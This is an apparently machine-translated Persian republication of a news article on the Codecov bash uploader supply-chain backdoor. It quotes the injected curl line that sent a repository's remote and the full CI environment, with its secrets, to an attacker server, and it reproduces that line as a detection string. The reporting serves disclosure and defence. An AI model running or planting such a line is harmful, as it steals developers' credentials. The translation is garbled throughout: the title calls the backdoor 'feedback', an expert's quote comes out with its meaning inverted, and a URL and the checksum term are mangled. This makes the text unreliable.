[ad_1]

از ابزار توسعه دهنده بازخورد که اطلاعات را به سرقت برد ، به مدت 3 ماه اجتناب شد

گتی ایماژ

یک ابزار توسعه نرم افزار در دسترس عموم حاوی کد مخربی بود که اطلاعات احراز هویت مورد نیاز برنامه ها را برای دسترسی به منابع حساس سرقت می کرد. این آخرین افشاگری در مورد حمله زنجیره تأمین است که امکان خاموش کردن شبکه های سازمان های بی شماری را دارد.

هود Codecov bash شامل درب عقب از اواخر ژانویه تا اوایل آوریل است ، توسعه دهندگان این ابزار روز پنجشنبه اعلام کردند. درپشتی باعث شد که رایانه های توسعه دهنده نشانه های احراز هویت مخفی و سایر داده های حساس را به یک سایت از راه دور کنترل شده توسط هکرها ارسال کنند. آپلود کننده با سیستم عامل های توسعه ، از جمله Github Actions ، CircleCI و Bitrise Step کار می کند ، همه از وجود چنین نشانه های احراز هویت مخفی در محیط توسعه پشتیبانی می کنند.

پشته های AWS و مدارک دیگر در ابر

بارگذارکننده Codec کاری را انجام می دهد که به عنوان پوشش کد برای پروژه های بزرگ توسعه نرم افزار شناخته می شود. به توسعه دهندگان این امکان را می دهد تا گزارش های پوششی را ارائه دهند که ، در میان سایر موارد ، تعیین کنند چه مقدار از کد کد توسط اسکریپت های تست داخلی آزمایش شده است. برخی از پروژه های توسعه ، Codecov و سرویس های شخص ثالث مشابه را در سیستم عامل خود ادغام می کنند ، جایی که دسترسی آزاد به اعتبارنامه های حساس وجود دارد که می تواند برای سرقت یا اصلاح کد منبع استفاده شود.

کدی مشابه این خط واحد برای اولین بار در تاریخ 31 ژانویه ظاهر شد:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https:///upload/v2 || true

این کد هم محل مخزن GitHub و هم کل محیط فرآیند را به سایت از راه دور می فرستد ، که ویرایش شده است ، زیرا Codecov می گوید این بخشی از تحقیقات فدرال است. این نوع از محیط ها به طور معمول نشانه ها ، گواهینامه ها و سایر اسرار نرم افزاری را در Amazon Web Services یا GitHub ذخیره می کنند.

HD Moore ، کارشناس امنیت و مدیر عامل پلت فرم کشف شبکه Rumble ، گفت: مسلح به این اسرار ، هیچ چیز مخربی که یک مهاجم می تواند در محیط های توسعه که به ابزار متکی هستند انجام دهد.

وی نوشت: “این واقعاً به آنچه در محیط بستگی دارد بستگی دارد ، اما از این نظر كه مهاجمان دسترسی داشتند (از طریق bash uploader) ، آنها ممكن است بتوانند درهای پشتی را در سیستم هایی كه وی كار می كرد قرار دهند”. در پیامی مستقیم به ارس. “برای GitHub / CircleCI ، این کد منبع و اعتبارنامه را بیشتر نشان می دهد.”

مور ادامه داد.

مهاجمان احتمالاً علاوه بر نشانه هایی که می توانند به آنها دسترسی داشته باشند به ذخیره سازی خصوصی ، که شامل کد منبع است ، و همچنین سایر مواردی که رمز برای آنها مجاز است ، با انبوهی از AWS و سایر مدارک معتبر در فضای ابری همراه هستند. به عنوان آخرین چاره ، این اعتبار جاودانه خواهد شد – مهاجمان از رمز GitHub دزدیده شده برای بستن پشت کد منبع استفاده می کنند ، که پس از آن داده های پایین دست مشتری و دیگر موارد را می دزدد. برای AWS و سایر مدارک معتبر در ابر نیز می توان همین را گفت. اگر اعتبارنامه اجازه این کار را بدهد ، می تواند اجازه جذب زیرساخت ، دسترسی به پایگاه داده ، دسترسی به پرونده و غیره را بدهد.

روز پنجشنبه ، در یک شورا ، کدکف گفت که نسخه مخرب برنامه بارگذاری کننده bash می تواند دسترسی داشته باشد:

  • هرگونه اطلاعات کاربری ، رمز یا کلیدی که مشتریان ما از طریق دونده CI (ادغام مداوم) خود منتقل کرده اند که هنگام اجرای اسکریپت بارگذاری bash در دسترس خواهد بود
  • کلیه سرویس ها ، انبارهای داده و کد برنامه که با این اعتبارنامه ها ، برچسب ها یا کلیدها قابل دسترسی هستند
  • با استفاده از bash uploaders برای بارگذاری پوشش در Codecov در CI ، اطلاعات راه دور (URL ذخیره منبع) را ذخیره کنید.

“براساس نتایج تحقیقات پزشکی قانونی ، به نظر می رسد که در اوایل 31 ژانویه 2021 به طور دوره ای دسترسی غیر مجاز به کلید Google Cloud Storage (GCS) وجود داشته است ، که به شخص ثالث مخرب اجازه می دهد نسخه اسکریپت ما را برای بارگذاری bash تغییر دهد. برای صادرات بالقوه اطلاعات منوط به ادغام مداوم به یک سرور شخص ثالث ، “Codecov گفت. “کدکف سناریو را در اول آوریل 2021 تهیه و حذف کرد.”

مشاور Codecov گفت: خطایی در روند ایجاد تصاویر Codecov در Docker به هکر اجازه می دهد تا اطلاعات مورد نیاز برای تغییر اسکریپت بارگذاری bash را بازیابی کند.

این جعل در تاریخ 1 آوریل توسط مشتری کشف شد که متوجه شد شاسوم ، که به عنوان یک اثر انگشت دیجیتال برای تأیید صحت بارگذارنده bash عمل می کند ، با شاسی نسخه بارگیری شده از https://codecov.io/ bash مطابقت ندارد . مشتری با کدکف تماس گرفت و سازنده نسخه مخرب را بارگیری کرد و تحقیقات را آغاز کرد.

Codecov از هرکسی که در دوره متأثر از به روزرسانی bash استفاده کرده است ، می خواهد اعتبار ، نشانه یا کلید موجود در فرآیندهای CI را لغو کرده و اعتبار جدید ایجاد کند. توسعه دهندگان با اجرا می توانند تعیین کنند که کدام کلیدها و نشانه ها در محیط CI ذخیره می شوند env تیم در خط لوله CI. همه چیز حساس را باید مصالحه دانست.

علاوه بر این ، هرکسی که از نسخه ذخیره شده محلی bash uploader استفاده می کند ، باید آن را از نظر موارد زیر بررسی کند:

Curl -sm 0.5 -d “$(git remote -v)

اگر این دستورات در جایی در bash uploader ذخیره شده محلی وجود داشته باشد ، کاربران باید بلافاصله آخرین نسخه از https: //codecov.io.bash را بارگذاری کنند.

Codecov گفت توسعه دهندگانی که از نسخه خود به روز شده bash استفاده می کنند بعید است تحت تأثیر قرار بگیرند. “برای تحت تأثیر قرار گرفتن ، خط لوله CI شما باید فایل بارگذاری bash را به جای نصب خود نصب شده Codecov ، از https://codecov.io/bash بارگیری کنید. با بررسی پیکربندی خط لوله CI ، می توانید bash uploader را از کجا دریافت کنید. “

جذابیت حملات زنجیره تامین

سازش در سیستم توسعه و توزیع نرم افزار Codecov آخرین حمله زنجیره تأمین است که ظاهر می شود. در ماه دسامبر ، سازشی مشابه با SolarWinds ، سازنده ابزارهای مدیریت شبکه در آستین ، تگزاس ، که توسط حدود 300000 سازمان در سراسر جهان ، از جمله شرکتهای Fortune 500 و سازمانهای دولتی مورد استفاده قرار گرفت ، اتفاق افتاد.

سپس هکرهایی که مرتکب این تخلف شدند ، یک به روزرسانی پشتیبان را توزیع کردند که توسط حدود 18000 مشتری بارگیری شد. سرانجام حدود 10 آژانس فدرال ایالات متحده و 100 شرکت خصوصی محموله های پیگیری دریافت کردند که اطلاعات حساس را به سرورهای کنترل شده توسط مهاجمان ارسال می کرد. FireEye ، مایکروسافت ، Mimecast و Malwarebytes به این کمپین وارد شدند.

اخیراً ، هکرها به زنجیره تأمین نرم افزاری که برای نصب بدافزار برای نظارت بر رایانه افراد با استفاده از NoxPlayer ، یک بسته نرم افزاری که از سیستم عامل Android در رایانه های شخصی و مکینتاش شبیه سازی می کند ، حمله کردند ، به طور عمده به کاربران امکان می دهد بازی های موبایل را در این سیستم عامل ها انجام دهند. محققان ESET گفتند كه نسخه معكوس NoxPlayer به مدت پنج ماه در دسترس بوده است.

جذابیت حملات زنجیره تأمین برای هکرها گستردگی و اثربخشی آنهاست. با به خطر انداختن پخش کننده با محتوای نرم افزاری بالا ، هکرها می توانند به طور بالقوه هر شخص یا سازمانی را که از این محصول به خطر افتاده استفاده می کند ، آلوده کنند. ویژگی دیگری که به نظر هکرها مفید است: برای شناسایی بدافزارهایی که از این طریق توزیع می شوند ، غالباً کم یا هیچ کاری نمی توان انجام داد ، زیرا امضای دیجیتال قانونی بودن آن را نشان می دهد.

در مورد نسخه backdoored به روزرسانی bash ، برای Codecov یا یکی از مشتریان آن آسان است که با انجام کاری غیر از بررسی bashum ، سوice نیت را تشخیص دهند. احتمال فرار از اخطار سه ماهه نسخه مخرب نشان می دهد که کسی برای انجام این بررسی ساده زحمت نگرفته است.

افرادی که از تاریخ 31 ژانویه تا 1 آوریل از برنامه به روزرسانی bash استفاده کرده اند ، باید مراحل زیر را برای تعیین علائم سازش به دقت بررسی کنند ، مراحل ذکر شده در هیئت مدیره پنجشنبه.

[ad_2]

منبع: tarjome-news.ir